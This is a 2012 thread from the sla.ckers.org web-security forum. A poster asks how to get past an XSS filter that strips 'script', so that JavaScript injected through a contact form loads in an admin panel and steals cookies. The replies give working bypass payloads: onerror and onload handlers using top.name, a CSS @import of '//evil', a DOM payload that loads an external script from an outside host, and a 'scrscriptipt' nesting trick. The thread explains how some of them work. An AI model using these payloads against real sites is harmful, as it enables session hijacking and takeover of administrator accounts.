Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Bypass Weird XSS Filter; Help?
Posted by: Anonymous User
Date: March 22, 2012 12:41AM

So this one site has an XSS filter where the word "script" is stripped from any input.

I am able to inject <img src=1 onerror=> stuff, but what I want to do is be able to do the equivalent of <script src=xssshell.asp></script>.

Basically I want to be able to load external scripts. Is that possible to do with onerror? Also it can't be too long.

Also, I can inject an iframe, but that's almost useless for getting cookies because of same origin policy.



Edited 2 time(s). Last edit at 03/22/2012 01:50AM by cookiesui.

Options: ReplyQuote
Re: Bypass Weird XSS Filter; Help?
Posted by: Gareth Heyes
Date: March 22, 2012 05:08AM

<img src=1 onerror=location=top.name>

<style>@import//evil;

<iframe onload=location=top.name>

Or use the dom:
<img src=1 onerror=with(s=createElement('s\cript'))src='//businessinfo.co.uk/labs/xss/xss.js',document.body.appendChild(s)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 03/22/2012 05:08AM by Gareth Heyes.

Options: ReplyQuote
Re: Bypass Weird XSS Filter; Help?
Posted by: Anonymous User
Date: March 22, 2012 08:29AM

Wait, so what part of this is directly from your injection?

<img src=1 onerror=>

Also, what are you injecting into? (Attribute, page body, etc..)

And an Iframe is not useless if the data you are loading in the frame is designed to reach into the users cookies and pull out the data. (unless HTTPOnly flag is set on the cookie)

Options: ReplyQuote
Re: Bypass Weird XSS Filter; Help?
Posted by: Anonymous User
Date: March 22, 2012 02:33PM

Gareth Heyes Wrote:
-------------------------------------------------------
> <img src=1 onerror=location=top.name>
>
> <style>@import//evil;
>
> <iframe onload=location=top.name>
>
> Or use the dom:
> <img src=1 onerror=with(s=createElement('s\cript'))src='//businessinfo.co.uk/labs/xss/xss.js',document.body.appendChild(s)>

Can you explain how the first 3 work and how I would use them? And thanks; I'll give the last one a try :P


./D Wrote:
-------------------------------------------------------
> Wait, so what part of this is directly from your
> injection?
>
> <img src=1 onerror=>
>
> Also, what are you injecting into? (Attribute,
> page body, etc..)
>
> And an Iframe is not useless if the data you are
> loading in the frame is designed to reach into the
> users cookies and pull out the data. (unless
> HTTPOnly flag is set on the cookie)

Er, I can inject <img src=1 onerror=alert('hi')> using a contact form, and it ends up in the page body of an admin cp.

Could you go into detail (or point me towards a link) about how to get the cookie of the parent window, while inside an iframe from an external source? I'm a noob at this stuff.



Edited 1 time(s). Last edit at 03/22/2012 02:38PM by cookiesui.

Options: ReplyQuote
Re: Bypass Weird XSS Filter; Help?
Posted by: Gareth Heyes
Date: March 23, 2012 06:17AM

top.name works by getting the payload from the window name. You can set the value to javascript:alert(1) or whatever from an iframe/new window or a simple redirection as long as it sets window.name='payload'.

@import would just import a css file that contains expression and would work on <=IE7 or compat mode. Such as:
http://www.businessinfo.co.uk/labs/xss/xss.css

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Bypass Weird XSS Filter; Help?
Posted by: lightos
Date: March 24, 2012 06:07AM

Just curious, since you said the word script is stripped out, does scrscriptipt work? Those type of filters always make me giggle.

Options: ReplyQuote


Sorry, only registered users may post in this forum.